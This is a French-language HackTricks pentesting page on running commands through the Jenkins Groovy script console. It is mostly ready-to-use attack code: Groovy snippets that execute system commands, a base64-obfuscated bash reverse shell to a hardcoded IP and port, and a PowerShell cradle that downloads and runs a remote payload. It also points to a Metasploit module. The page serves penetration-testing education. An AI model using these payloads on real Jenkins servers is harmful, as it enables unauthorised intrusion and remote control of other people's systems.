Jenkins RCE with Groovy Script

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
Obtenez le merchandising officiel PEASS & HackTricks
Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.

Jenkins RCE avec un script Groovy

Ceci est moins bruyant que de créer un nouveau projet dans Jenkins

Allez à chemin_jenkins/script
Dans la zone de texte, introduisez le script

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Vous pouvez exécuter une commande en utilisant : cmd.exe /c dir

Sous linux, vous pouvez faire : "ls /".execute().text

Si vous avez besoin d'utiliser des guillemets et des apostrophes à l'intérieur du texte. Vous pouvez utiliser """PAYLOAD""" (triple guillemets doubles) pour exécuter le payload.

Un autre script groovy utile est (remplacez [INSERT COMMAND]) :

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Shell inversé sous Linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Shell inversé sous Windows

Vous pouvez préparer un serveur HTTP avec un shell inversé PS et utiliser Jeking pour le télécharger et l'exécuter :

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Script

Vous pouvez automatiser ce processus avec ce script.

Vous pouvez utiliser MSF pour obtenir un shell inversé :

msf> use exploit/multi/http/jenkins_script_console

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
Obtenez le merchandising officiel PEASS & HackTricks
Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.

PrécédentBasic Jenkins Information SuivantJenkins RCE Creating/Modifying Project

Dernière mise à jour il y a 4 mois